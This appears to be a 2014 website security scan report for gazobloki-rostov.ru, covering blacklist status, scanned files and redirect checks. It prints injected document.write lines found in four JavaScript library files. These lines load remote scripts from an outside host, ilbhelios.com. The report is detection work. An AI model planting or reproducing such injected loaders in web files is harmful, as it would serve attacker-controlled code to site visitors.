Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gazobloki-rostov.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gazobloki-rostov.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gazobloki-rostov.ru/ | 200 OK Content-Length: 13871 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/js/jquery-1.4.3.min.js | 200 OK Content-Length: 77893 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ilbhelios.com/cgi-bin/b86YdwNk.php?id=91518143"></script>');
| ||
http://gazobloki-rostov.ru/fancybox/jquery.easing.1.3.js | 200 OK Content-Length: 8244 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ilbhelios.com/cgi-bin/b86YdwNk.php?id=91518140"></script>');
| ||
http://gazobloki-rostov.ru/fancybox/jquery.fancybox-1.2.1.pack.js | 200 OK Content-Length: 8450 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ilbhelios.com/cgi-bin/b86YdwNk.php?id=91518141"></script>');
| ||
http://gazobloki-rostov.ru/js/tooltip.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ilbhelios.com/cgi-bin/b86YdwNk.php?id=91518151"></script>');
| ||
http://gazobloki-rostov.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 14 Apr 2014 05:55:05 GMT Location: http://gazobloki-rostov.ru Server: nginx/0.5.33 Content-Length: 388 Content-Type: text/html; charset=iso-8859-1 | clean |
http://gazobloki-rostov.ru/test404page.js | 404 Not Found Content-Length: 590 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=about | 200 OK Content-Length: 13101 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=pages&id=21 | 200 OK Content-Length: 14075 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=pages&id=25 | 200 OK Content-Length: 18986 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=pages&id=26 | 200 OK Content-Length: 11888 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=contacts | 200 OK Content-Length: 14088 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=news&id=89 | 200 OK Content-Length: 12174 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/?page=news&all=all | 200 OK Content-Length: 17269 Content-Type: text/html | clean |
http://gazobloki-rostov.ru/cms/img/news/b38e7fee5882df8271ae89064feed31e.jpg | 200 OK Content-Length: 30124 Content-Type: image/jpeg | clean |
http://gazobloki-rostov.ru/cms/img/news/1aa93e78a0e62e78c93988ea46de71c0.jpg | 200 OK Content-Length: 30482 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gazobloki-rostov.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Apr 2014 05:55:04 GMT
Server: nginx/0.5.33
Content-Type: text/html
X-Powered-By: PHP/5.2.4-2ubuntu5.24
GET / HTTP/1.1
Host: gazobloki-rostov.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Apr 2014 05:55:04 GMT
Server: nginx/0.5.33
Content-Type: text/html
X-Powered-By: PHP/5.2.4-2ubuntu5.24
Second query (visit from search engine):
GET / HTTP/1.1
Host: gazobloki-rostov.ru
Referer: http://www.google.com/search?q=gazobloki-rostov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gazobloki-rostov.ru
Referer: http://www.google.com/search?q=gazobloki-rostov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.